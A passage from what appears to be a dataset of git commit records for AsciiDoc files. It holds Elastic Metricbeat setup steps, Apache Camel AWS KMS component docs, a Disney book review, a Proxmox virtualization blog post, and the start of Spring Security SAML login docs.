Metricbeat.\n+\n[source,shell]\n----\n.\/metricbeat -e\n----\n+\n`-e` is optional and sends output to standard error instead of the configured\nlog output.\n\n. Log in to Kibana, open the main menu, and click **Stack Monitoring**.\n+\nYou\u2019ll see cluster alerts that require your attention and a summary of the available monitoring metrics for Elasticsearch. 
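If this page stays empty, one way to confirm that events are being indexed is to query the index list directly (an illustrative check only; the CA file, user, and host are the ones configured in the previous steps):\n+\n[source,shell]\n----\ncurl --cacert elasticsearch-ca.pem -u metricbeat_writer \"https:\/\/<your_elasticsearch_host>:9200\/_cat\/indices\/metricbeat-*?v\"\n----\n+\n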
Click any of the header links on the available cards to view additional information.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4be04eb7624505d89843a3abc4f6444ab6e2ad7b","subject":"CAMEL-14478 - Create an AWS-KMS component based on SDK v2, docs","message":"CAMEL-14478 - Create an AWS-KMS component based on SDK v2, docs\n","repos":"apache\/camel,mcollovati\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,tdiesler\/camel,nicolaferraro\/camel,christophd\/camel,DariusX\/camel,adessaigne\/camel,ullgren\/camel,apache\/camel,alvinkwekel\/camel,pmoerenhout\/camel,mcollovati\/camel,cunningt\/camel,adessaigne\/camel,DariusX\/camel,pmoerenhout\/camel,tadayosi\/camel,nicolaferraro\/camel,christophd\/camel,ullgren\/camel,gnodet\/camel,cunningt\/camel,christophd\/camel,adessaigne\/camel,christophd\/camel,apache\/camel,pmoerenhout\/camel,ullgren\/camel,adessaigne\/camel,tadayosi\/camel,cunningt\/camel,pax95\/camel,DariusX\/camel,alvinkwekel\/camel,tadayosi\/camel,gnodet\/camel,zregvart\/camel,tdiesler\/camel,gnodet\/camel,tadayosi\/camel,nikhilvibhav\/camel,apache\/camel,tadayosi\/camel,adessaigne\/camel,alvinkwekel\/camel,DariusX\/camel,christophd\/camel,pmoerenhout\/camel,tdiesler\/camel,zregvart\/camel,pax95\/camel,zregvart\/camel,nicolaferraro\/camel,nicolaferraro\/camel,cunningt\/camel,alvinkwekel\/camel,christophd\/camel,pax95\/camel,tdiesler\/camel,pax95\/camel,mcollovati\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,tadayosi\/camel,mcollovati\/camel,zregvart\/camel,pax95\/camel,apache\/camel,adessaigne\/camel,ullgren\/camel,cunningt\/camel,tdiesler\/camel,pax95\/camel,tdiesler\/camel,gnodet\/camel,gnodet\/camel,apache\/camel,cunningt\/camel,nikhilvibhav\/camel","old_file":"components\/camel-aws2-kms\/src\/main\/docs\/aws-kms-component.adoc","new_file":"components\/camel-aws2-kms\/src\/main\/docs\/aws-kms-component.adoc","new_contents":"","old_contents":"[[aws-kms-component]]\n= AWS KMS Component\n\n*Since Camel 2.21*\n\n\/\/ HEADER START\n*Only producer is supported*\n\/\/ HEADER END\n\nThe KMS component supports the ability to work with keys stored in\nhttps:\/\/aws.amazon.com\/kms\/[AWS KMS] instances.\n\nPrerequisites\n\nYou must have a valid Amazon Web Services developer account, and be\nsigned up to use Amazon KMS. More information is available at\nhttps:\/\/aws.amazon.com\/kms\/[Amazon KMS].\n\n== URI Format\n\n[source,java]\n-------------------------\naws-kms:\/\/label[?options]\n-------------------------\n\nYou can append query options to the URI in the following format,\n?options=value&option2=value&...\n\n== URI Options\n\n\n\/\/ component options: START\nThe AWS KMS component supports 6 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *configuration* (advanced) | The AWS KMS default configuration | | KMSConfiguration\n| *accessKey* (producer) | Amazon AWS Access Key | | String\n| *secretKey* (producer) | Amazon AWS Secret Key | | String\n| *region* (producer) | The region in which KMS client needs to work | | String\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). 
By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n|===\n\/\/ component options: END\n\n\n\n\n\/\/ endpoint options: START\nThe AWS KMS endpoint is configured using URI syntax:\n\n----\naws-kms:label\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *label* | *Required* Logical name | | String\n|===\n\n\n=== Query Parameters (11 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *accessKey* (producer) | Amazon AWS Access Key | | String\n| *kmsClient* (producer) | To use a existing configured AWS KMS as client | | AWSKMS\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | *Required* The operation to perform | | KMSOperations\n| *proxyHost* (producer) | To define a proxy host when instantiating the KMS client | | String\n| *proxyPort* (producer) | To define a proxy port when instantiating the KMS client | | Integer\n| *proxyProtocol* (producer) | To define a proxy protocol when instantiating the KMS client | HTTPS | Protocol\n| *region* (producer) | The region in which KMS client needs to work. When using this parameter, the configuration will expect the capitalized name of the region (for example AP_EAST_1) You'll need to use the name Regions.EU_WEST_1.name() | | String\n| *secretKey* (producer) | Amazon AWS Secret Key | | String\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). 
| false | boolean\n|===\n\/\/ endpoint options: END\n\/\/ spring-boot-auto-configure options: START\n== Spring Boot Auto-Configuration\n\nWhen using Spring Boot make sure to use the following Maven dependency to have support for auto configuration:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel.springboot<\/groupId>\n <artifactId>camel-aws-kms-starter<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n\nThe component supports 15 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.aws-kms.access-key* | Amazon AWS Access Key | | String\n| *camel.component.aws-kms.basic-property-binding* | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | Boolean\n| *camel.component.aws-kms.bridge-error-handler* | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | Boolean\n| *camel.component.aws-kms.configuration.access-key* | Amazon AWS Access Key | | String\n| *camel.component.aws-kms.configuration.kms-client* | To use a existing configured AWS KMS as client | | AWSKMS\n| *camel.component.aws-kms.configuration.operation* | The operation to perform | | KMSOperations\n| *camel.component.aws-kms.configuration.proxy-host* | To define a proxy host when instantiating the KMS client | | String\n| *camel.component.aws-kms.configuration.proxy-port* | To define a proxy port when instantiating the KMS client | | Integer\n| *camel.component.aws-kms.configuration.proxy-protocol* | To define a proxy protocol when instantiating the KMS client | | Protocol\n| *camel.component.aws-kms.configuration.region* | The region in which KMS client needs to work. When using this parameter, the configuration will expect the capitalized name of the region (for example AP_EAST_1) You'll need to use the name Regions.EU_WEST_1.name() | | String\n| *camel.component.aws-kms.configuration.secret-key* | Amazon AWS Secret Key | | String\n| *camel.component.aws-kms.enabled* | Whether to enable auto configuration of the aws-kms component. This is enabled by default. | | Boolean\n| *camel.component.aws-kms.lazy-start-producer* | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. 
| false | Boolean\n| *camel.component.aws-kms.region* | The region in which KMS client needs to work | | String\n| *camel.component.aws-kms.secret-key* | Amazon AWS Secret Key | | String\n|===\n\/\/ spring-boot-auto-configure options: END\n\n\n\n\nRequired KMS component options\n\nYou have to provide the amazonKmsClient in the\nRegistry or your accessKey and secretKey to access\nthe https:\/\/aws.amazon.com\/kms\/[Amazon KMS] service.\n\n== Usage\n\n=== Message headers evaluated by the KMS producer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n\n|`CamelAwsKMSLimit` |`Integer` |The limit number of keys to return while performing a listKeys operation\n\n|`CamelAwsKMSOperation` |`String` |The operation we want to perform\n\n|`CamelAwsKMSDescription` |`String` |A key description to use while performing a createKey operation\n\n|`CamelAwsKMSKeyId` |`String` |The key Id \n|=======================================================================\n\n=== KMS Producer operations\n\nCamel-AWS KMS component provides the following operation on the producer side:\n\n- listKeys\n- createKey\n- disableKey\n- scheduleKeyDeletion\n- describeKey\n- enableKey\n\n== Producer Examples\n\n- listKeys: this operation will list the available keys in KMS\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:listKeys\")\n .to(\"aws-kms:\/\/test?kmsClient=#amazonKmsClient&operation=listKeys\")\n--------------------------------------------------------------------------------\n\n== Automatic detection of AWSKMS client in registry\n\nThe component is capable of detecting the presence of an AWSKMS bean into the registry.\nIf it's the only instance of that type it will be used as client and you won't have to define it as uri parameter.\nThis may be really useful for smarter configuration of the endpoint.\n\nDependencies\n\nMaven users will need to add the following dependency to their pom.xml.\n\n*pom.xml*\n\n[source,xml]\n---------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-aws-kms<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n---------------------------------------\n\nwhere `$\\{camel-version\\}` must be replaced by the actual version of Camel.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d82f9f3df6ef3654d557c8c7f4037aa1161f9b65","subject":"Update 2016-10-18-Book-Review-Progress-City-Primer.adoc","message":"Update 2016-10-18-Book-Review-Progress-City-Primer.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-10-18-Book-Review-Progress-City-Primer.adoc","new_file":"_posts\/2016-10-18-Book-Review-Progress-City-Primer.adoc","new_contents":"= Book Review: Progress City Primer\n:hp-tags: Reviews, Disney World, Disneyland\n:hp-image: covers\/ProgressCityPrimer.png\n\nimage::covers\/ProgressCityPrimer.png[caption=\"Progress City Primer by Michael Crawford\", link=\"https:\/\/www.amazon.com\/gp\/product\/0986205060\/ref=as_li_tl?ie=UTF8&camp=1789&creative=9325&creativeASIN=0986205060&linkCode=as2&tag=habumacom-20&linkId=bb1ea4f5992ed4690bbad1c892ec99a3\"]\n\nIf you're anything like me, you enjoy reading, but struggle to find books that both capture and hold your attention. 
As a Disney fanatic, however, I've discovered that there are countless books available about Walt Disney, the Walt Disney Company, and the Disney Parks. On the off-chance that some of our _MouseGuests_ readers are looking for a good book to read, I thought I'd write some book reviews on this blog, sharing my thoughts on some of the best Disney books I find.\n\nAmong the many books on Disney are several books that delve into Disney history, including one that I finished recently, https:\/\/www.amazon.com\/gp\/product\/0986205060\/ref=as_li_tl?ie=UTF8&camp=1789&creative=9325&creativeASIN=0986205060&linkCode=as2&tag=habumacom-20&linkId=bb1ea4f5992ed4690bbad1c892ec99a3[_Progress City Primer: Stories, Secrets, and Silliness from the Many Worlds of Walt Disney_ by Michael Crawford].\n\nWalt Disney was a storyteller. And virtually everything that has the Disney name on it, from the movies to the theme parks, is wrapped in a story. So it seems fitting that there be a book that tells stories about Disney. That's exactly what _Progress City Primer_ is: a collection of stories. Stories about Walt, stories about the imagineers, and stories about Disney's Parks.\n\nThe book doesn't follow a serial flow. Instead, it is structured such that you can pick it up and start reading at any chapter. (I read it front to back, but that was merely by choice.) Although all of the stories are interesting and provide insight into Walt and the history of the Disney company, I rather enjoyed the stories about Walt himself near the beginning of the book the most. Some of the best stories are \"The Lake Buena Vista STOLport\", \"Walt Disney vs. the Air Pirates\", and \"Pooh for President\", all collected and retold brilliantly by the author. My favorite story in _Progress City Primer_ is a humorous story about Walt Disney, Herb Ryman, and 49 tiny elephants in \"Walt's Elephants\". Although it's one of the shortest (if not _the_ shortest) story in the book, this one story alone is worth the price of the book.\n\nI found _Progress City Primer_ difficult to put down and found myself in multi-chapter marathon reading sessions on airplanes as I travel. My only complaint is that after 33 fascinating stories, the book ended and I was wanting more Disney stories. As a parting gift, there is an appendix that collects several Disney-related recipes, including a recipe for the iconic strawberry shortcake from the _Hoop-Dee-Doo Musical Revue_ at Walt Disney World's Fort Wilderness.\n\nI highly recommend _Progress City Primer_ to any reader who is even a marginal Disney fan. You won't be disappointed.\n\nHave you read _Progress City Primer_? What did you think? What Disney books can you recommend? Leave a comment and let us know!","old_contents":"= Book Review: Progress City Primer\n:hp-tags: Reviews, Disney World, Disneyland\n:hp-image: covers\/ProgressCityPrimer.png\n\nimage::covers\/ProgressCityPrimer.png[caption=\"Progress City Primer by Michael Crawford\", link=\"https:\/\/www.amazon.com\/gp\/product\/0986205060\/ref=as_li_tl?ie=UTF8&camp=1789&creative=9325&creativeASIN=0986205060&linkCode=as2&tag=habumacom-20&linkId=bb1ea4f5992ed4690bbad1c892ec99a3\"]\n\nIf you're anything like me, you enjoy reading, but struggle to find books that both capture and hold your attention. As a Disney fanatic, however, I've discovered that there are countless books available about Walt Disney, the Walt Disney Company, and the Disney Parks. 
On the off-chance that some of our _MouseGuests_ readers are looking for a good book to read, I though I'd write some book reviews on this blog, sharing my thoughts on some of the best Disney books I find.\n\nAmong the many books on Disney are several books that delve into Disney history, including one that I finished recently, https:\/\/www.amazon.com\/gp\/product\/0986205060\/ref=as_li_tl?ie=UTF8&camp=1789&creative=9325&creativeASIN=0986205060&linkCode=as2&tag=habumacom-20&linkId=bb1ea4f5992ed4690bbad1c892ec99a3[_Progress City Primer: Stories, Secrets, and Silliness from the Many Worlds of Walt Disney_ by Michael Crawford].\n\nWalt Disney was a storyteller. And virtually everything that has the Disney name on it, from the movies to the theme parks, is wrapped in a story. So it seems fitting that there be a book that tells stories about Disney. That's exactly what _Progress City Primer_ is: a collection of stories. Stories about Walt, stories about the imagineers, and stories about Disney's Parks.\n\nThe book doesn't follow a serial flow. Instead, it is structured such that you can pick it up and start reading at any chapter. (I, however, read it front to back, but that was merely by choice.) Although all of the stories are interesting and provide insight into Walt and the history of the Disney company, I rather enjoyed the stories about Walt himself near the beginning of the book the most. Some of the best stories are \"The Lake Buena Vista STOLport\", \"Walt Disney vs. the Air Pirates\", and \"Pooh for President\", all collected and retold brilliantly by the author. My favorite story in _Progress City Primer_ is a humorous story about Walt Disney, Herb Ryman, and 49 tiny elephants in \"Walt's Elephants\". Although it's one of the shortest (if not _the_ shortest) story in the book, this one story alone is worth the price of the book.\n\nI found _Progress City Primer_ difficult to put down and found myself in multi-chapter marathon reading sessions on airplanes as I travel. My only complaint is that after 33 fascinating stories, the book ended and I was wanting more Disney stories. As a parting gift, there is an appendix that collects several Disney-related recipes, including a recipe for the iconic strawberry shortcake from the _Hoop-Dee-Doo Musical Revue_ at Walt Disney World's Fort Wilderness.\n\nI highly recommend _Progress City Primer_ to any reader who is even a marginal Disney fan. You won't be disappointed.\n\nHave you read _Progress City Primer_? What did you think? What Disney books can you recommend? 
Leave a comment and let us know!","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"0b96467c82feed6660b24579458ca1bd6a26c57e","subject":"Update 2017-04-23-Server-Virtualization-Management.adoc","message":"Update 2017-04-23-Server-Virtualization-Management.adoc","repos":"roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io","old_file":"_posts\/2017-04-23-Server-Virtualization-Management.adoc","new_file":"_posts\/2017-04-23-Server-Virtualization-Management.adoc","new_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n\n= PVE: Virtualization for Work and Play (Part 1)\n:hp-alt-title: Server Virtualization Management\n:hp-tags: Blog, Open_Source, Technology\n:icons: image\n:linkattrs:\n:toc: macro \n:published_at: 2017-04-23\n\n== The Plan...\n\nSay we want a powerful \"bang for the buck\" home server for games _and_ other system-intensive pursuits. We may want to run powerful analytics applications which would undoubtedly require Linux, but we may also want to run Windows applications. We may want near-native 2D and 3D graphics performance inside the guest operating system (OS) while making dual-booting obsolete. Finally, we may want to do all of that from the comfort of our couch using a Windows, Linux or Mac laptop. Let's do it! \n\ntoc::[]\n\n== Introduction\n\nlink:https:\/\/en.wikipedia.org\/wiki\/X86_virtualization[Hardware virtualization^] allows multiple operating systems to simultaneously share processor resources. With the link:https:\/\/opensource.org\/[open source^] server management solution, link:https:\/\/www.proxmox.com\/en\/[Proxmox Virtual Environment (PVE)^], we can leverage hardware virtualization to achieve our goals. PVE enables the creation of multiple virtual OS \"servers\" via a Web GUI; as many as our hardware setup will allow. This guide will document the setup of PVE on the following hardware:\n\n* AMD Ryzen 7 1600 (8 cores, 16 threads @ 3.7GHz)\n* 64GB 2400MHz DDR4\n* Boot Drive: 1x 512GB NVMe SSD \n* Storage (Striped-mirrored ZFS):\n** 2x 1TB SATA SSD (striped)\n** 1x 2TB 7200rpm mechanical drives (mirrored)\n\nSo what's the difference between a VM and a container anyway, and how do we choose between them? A VM is computer software that emulates a particular computer hardware system and requires an OS to function. In other words, VMs \"pretend\" to be an actual computer of the type that _we_ specify and will need to have a Guest OS like Windows or Linux running. Containers are software that emulates the Host OS, to enable software to run predictably.\n\n[cols=\"1, 8a, 1\"]\n|===\n|\n|Diagram 1: Comparison of a VM & Container on One Machine\nimage:Server-Virtualization-Management\/vms-and-containers.png[vms-cnt]\n|\n|===\n\nIf we want to run multiple applications on one server, to have increased security, or to run an operating system that is different from our host system, then a VM is our choice. To run different versions of an application (e.g., RStudio) and validate reproducibility and reliability, then we want to use containers. 
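To make the distinction concrete, PVE gives us a separate command-line tool for each; the sketch below is purely illustrative (the IDs, names, memory size, and container template are made up for this example):\n\n[source,shell]\n----\n# KVM virtual machine with ID 100: emulates full hardware and needs its own guest OS\nqm create 100 --name win-guest --memory 16384 --net0 virtio,bridge=vmbr0\n\n# LXC container with ID 200: shares the host kernel and starts in seconds\npct create 200 local:vztmpl\/debian-9-standard_9.3-1_amd64.tar.gz --hostname rstudio\n----\n\n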
Compared to VMs, containers are quicker, \"lighter weight\" and more transient so they can be readily packaged, shared, and moved to other hardware.\n\n== Hardware Considerations\n\nOur CPU and motherboard must support \"virtualization\" (SVM) and IOMMU, which needs to be enabled in firmware for resource sharing. Also, we should have 32GB of RAM or more, so that we can reserve at least 16GB for a single virtual machine (VM) and still have enough memory left over for PVE and potentially other VMs running simultaneously.\n\nWhile most of our computer hardware can be shared between multiple VMs, the graphics card (GPU) may not readily be shared, so we'll need at least two GPUs:\n\n. One GPU for PVE (the host);\n. One powerful GPU for our VMs (the guests: Windows, Linux, etc.).\n\n== Software Considerations\n\nlink:https:\/\/jannikjung.me\/proxmox-ve-5-0-beta1\/[PVE 5.0^] is based on link:https:\/\/wiki.debian.org\/DebianStretch[Debian Linux (Stretch)^]. Since our Ryzen hardware is rather new, our host system needs to have a Linux kernel version 4.10 or later. Although in beta at the time of this writing, PVE 5.0 has better support for Ryzen than PVE 4.4.\n\nPVE natively supports both link:https:\/\/www.linux-kvm.org\/page\/Main_Page[KVM^] for hardware virtualization and link:https:\/\/linuxcontainers.org\/lxc\/introduction\/[LXC containers^] for Linux system virtualization. Since the guest systems can run under hardware virtualization, we get some added bonuses. For example, we can benefit from Ryzen hardware and still get link:http:\/\/www.pcworld.com\/article\/3189990\/windows\/microsoft-blocks-kaby-lake-and-ryzen-pcs-from-windows-7-81-updates.html[Windows 7 updates^]. We would need to identify our Windows link:https:\/\/www.nextofwindows.com\/the-best-way-to-uniquely-identify-a-windows-machine[Universally Unique Identifier (UUID)^] so that it may be identical on our VM. Otherwise, Microsoft may think that we have a new version of Windows that needs to be registered.\n\nWe will use link:https:\/\/github.com\/zfsonlinux\/zfs\/wiki\/faq[ZFS^], a storage platform that encompasses the functionality of traditional filesystems, volume managers, and more, with consistent reliability and performance. Our ZFS installation will be compressed and striped: our two SSD drives will run in parallel and require less storage space, which improves read\/write performance. In addition, our ZFS will be mirrored: our SSD drives will be cloned so that we have a backup in case of drive failure.\n\n[cols=\"1, 8a\"]\n|===\n^.^|image:\/images\/icons\/lightbulb.png[icon=\"tip\",size=\"4x\",width=56]\n|*About That*: KVM supports multiple disk formats: raw images, the native QEMU format (qcow2), VMware format, and many more. When working with ZFS on PVE, we need to use raw images. It may not seem obvious at first, but we can easily convert an existing KVM file from one format to a raw image. Near the end of this guide, we'll cover the process to convert a qcow2 format to the required PVE raw image.\n|===\n\n== Next Steps...\n\nThis is Part 1 of a multipart tutorial, and a work in progress. As I complete each part, I'll update the links. 
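In the meantime, it's worth noting that the qcow2-to-raw conversion mentioned in the tip above boils down to a single `qemu-img` command (a sketch; the file names are placeholders):\n\n[source,shell]\n----\nqemu-img convert -f qcow2 -O raw vm-disk.qcow2 vm-disk.raw\n----\n\n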
Roughly speaking the next parts are as follows:\n\n* link:\/2017\/04\/25\/Server-Virtualization-Management-Part2.html[Part 2: Getting Started]\n* Part 3: System Optimization\n","old_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n\n= PVE: Virtualization for Work and Play (Part 1)\n:hp-alt-title: Server Virtualization Management\n:hp-tags: Blog, Open_Source, Technology\n:icons: image\n:linkattrs:\n:toc: macro \n:published_at: 2017-04-23\n\n== The Plan...\n\nSay we want a powerful \"bang for the buck\" home server for games _and_ other system-intensive pursuits. We may want to run powerful analytics applications which would undoubtedly require Linux, but we may also want to run Windows applications. We may want near native 2D and 3D graphics performance inside the guest operating system (OS) while making dual-booting obsolete. Finally, we may want to do all of that from the comfort of our couch using a Windows, Linux or Mac laptop. Lets do it! \n\ntoc::[]\n\n== Introduction\n\nlink:https:\/\/en.wikipedia.org\/wiki\/X86_virtualization[Hardware virtualization^] allows multiple operating systems to simultaneously share processor resources. With the link:https:\/\/opensource.org\/[open source^] server management solution, link:https:\/\/www.proxmox.com\/en\/[Proxmox Virtual Environment (PVE)^], we can leverage hardware virtualization to achieve our goals. PVE enables the creation of multiple virtual OS \"servers\" via a Web GUI; as many as our hardware setup will allow. This guide will document the setup of PVE on the following hardware:\n\n* AMD Ryzen 7 1600 (8 cores, 16 threads @ 3.7GHz)\n* 64GB 2400MHz DDR4\n* Boot Drive: 1x 512GB NVMe SSD \n* Storage (Striped-mirrored ZFS):\n** 2x 1TB SATA SSD (striped)\n** 1x 2TB 7200rpm mechanical drives (mirrored)\n\nSo what's the difference between a VM and a container anyway, and how do we choose between them? A VM is computer software that emulates a particular computer hardware system and requires an OS to function. In other words, VMs \"pretend\" to be an actual computer of the type that _we_ specify and will need to have a Guest OS like Windows or Linux running. Containers are software that emulates the Host OS, to enable software to run predictably.\n\n[cols=\"1, 8a, 1\"]\n|===\n|\n|Diagram 1: Comparison of a VM & Container on One Machine\nimage:Server-Virtualization-Management\/vms-and-containers.png[vms-cnt]\n|\n|===\n\nIf we want to run multiple applications on one server, to have increased security, or to run an operating system that is different from our host system, then a VM is our choice. To run different versions of an application (i.e RStudio) and validate reproducibility and reliability, then we want to use containers. Compared to VMs, containers are quicker, \"lighter weight\" and more transient so they can be readily packaged, shared, and moved to other hardware.\n\n== Hardware Considerations\n\nOur CPU and motherboard must support \"virtualization\u201d (SVM) and IOMMU, which needs to be enabled in firmware for resource sharing. 
Also, we should have 32GB of RAM or more, so that we can reserve at least 16GB for a single virtual machine (VM) and still have enough memory left over for PVE and potentially other VMs running simultaneously.\n\nWhile most of our computer hardware can be shared between multiple VMs, the graphics card (GPU) may not readily be shared, so we'll need at least two GPUs:\n\n. One GPU for PVE (the host);\n. One powerful GPU for our VMs (the guests: Windows, Linux, etc.).\n\n== Software Considerations\n\nlink:https:\/\/jannikjung.me\/proxmox-ve-5-0-beta1\/[PVE 5.0^] is based in link:https:\/\/wiki.debian.org\/DebianStretch[Debian Linux (Stretch)^]. Since our Ryzen hardware is rather new, our host system needs to have a Linux kernel version 4.10 or later. Although in beta at the time of this writing, PVE 5.0 has better support for Ryzen than PVE 4.4.\n\nPVE natively supports both link:https:\/\/www.linux-kvm.org\/page\/Main_Page[KVM^] for hardware virtualization and link:https:\/\/linuxcontainers.org\/lxc\/introduction\/[LXC containers^] for Linux system virtualization. Since the guest systems can run under hardware virtualization, we get some added bonuses. For example, we can benefit from Ryzen hardware and still get link:http:\/\/www.pcworld.com\/article\/3189990\/windows\/microsoft-blocks-kaby-lake-and-ryzen-pcs-from-windows-7-81-updates.html[Windows 7 updates^]. We would need to identify our Windows link:https:\/\/www.nextofwindows.com\/the-best-way-to-uniquely-identify-a-windows-machine[Universally Unique Identifier (UUID)^] so that it may be identical on our VM. Otherwise, Microsoft may think that we have a new version of Windows that needs to be registered.\n\nWe will use link:https:\/\/github.com\/zfsonlinux\/zfs\/wiki\/faq[ZFS^], a storage platform that encompasses the functionality of traditional filesystems, volume managers, and more, with consistent reliability, and performance. Our ZFS installation will be compressed and striped: our two SSD drives will run in parallel and require less storage space, which improves read\/write performance. In addition, our ZFS will be mirrored: our SSD drives will be cloned so that we have a backup in case of drive failure.\n\n[cols=\"1, 8a\"]\n|===\n^.^|image:\/images\/icons\/lightbulb.png[icon=\"tip\",size=\"4x\",width=56]\n|*About That*: KVM supports multiple disk formats; raw images, the native QEMU format (qcow2), VMware format, and many more. When working with ZFS on PVE, we need to use raw images. It may not seem obvious at first, but we can easily convert an existing KVM file from one format to a raw image. Near the end of this guide, we'll cover the process to convert a qcow2 format to the required PVE raw image.\n|===\n\n== Next Steps...\n\nThis is Part 1 of a multipart tutorial, and a work in progress. As I complete each part, I'll update the links. 
Roughly speaking the next parts are as follows:\n\n* link:\/2017\/04\/25\/Server-Virtualization-Management-Part2.html[Part 2: Getting Started]\n* Part 3: System Optimization\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"c495ff8759088499dd6f84611b7d60072dec3adc","subject":"Fix AuthnRequestConverter Sample Typos","message":"Fix AuthnRequestConverter Sample Typos\n\nCloses gh-10364\n","repos":"spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/saml2\/saml2-login.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/saml2\/saml2-login.adoc","new_contents":"\n[[servlet-saml2login]]\n== SAML 2.0 Login\n:figures: images\/servlet\/saml2\n:icondir: images\/icons\n\nThe SAML 2.0 Login feature provides an application with the capability to act as a SAML 2.0 Relying Party, having users https:\/\/wiki.shibboleth.net\/confluence\/display\/CONCEPT\/FlowsAndConfig[log in] to the application by using their existing account at a SAML 2.0 Asserting Party (Okta, ADFS, etc).\n\nNOTE: SAML 2.0 Login is implemented by using the *Web Browser SSO Profile*, as specified in\nhttps:\/\/www.oasis-open.org\/committees\/download.php\/35389\/sstc-saml-profiles-errata-2.0-wd-06-diff.pdf#page=15[SAML 2 Profiles].\n\n[[servlet-saml2login-spring-security-history]]\nSince 2009, support for relying parties has existed as an https:\/\/github.com\/spring-projects\/spring-security-saml\/tree\/1e013b07a7772defd6a26fcfae187c9bf661ee8f#spring-saml[extension project].\nIn 2019, the process began to port that into https:\/\/github.com\/spring-projects\/spring-security[Spring Security] proper.\nThis process is similar to the one started in 2017 for <<oauth2,Spring Security's OAuth 2.0 support>>.\n\n[NOTE]\n====\nA working sample for {gh-samples-url}\/servlet\/spring-boot\/java\/saml2-login[SAML 2.0 Login] is available in the {gh-samples-url}[Spring Security Samples repository].\n====\n\nLet's take a look at how SAML 2.0 Relying Party Authentication works within Spring Security.\nFirst, we see that, like <<oauth2login, OAuth 2.0 Login>>, Spring Security takes the user to a third-party for performing authentication.\nIt does this through a series of redirects.\n\n.Redirecting to Asserting Party Authentication\nimage::{figures}\/saml2webssoauthenticationrequestfilter.png[]\n\nThe figure above builds off our <<servlet-securityfilterchain,`SecurityFilterChain`>> and <<servlet-authentication-abstractprocessingfilter, `AbstractAuthenticationProcessingFilter`>> diagrams:\n\nimage:{icondir}\/number_1.png[] First, a user makes an unauthenticated request to the resource `\/private` for which it is not authorized.\n\nimage:{icondir}\/number_2.png[] Spring Security's <<servlet-authorization-filtersecurityinterceptor,`FilterSecurityInterceptor`>> indicates that the unauthenticated request is __Denied__ by throwing an `AccessDeniedException`.\n\nimage:{icondir}\/number_3.png[] Since the user lacks authorization, the 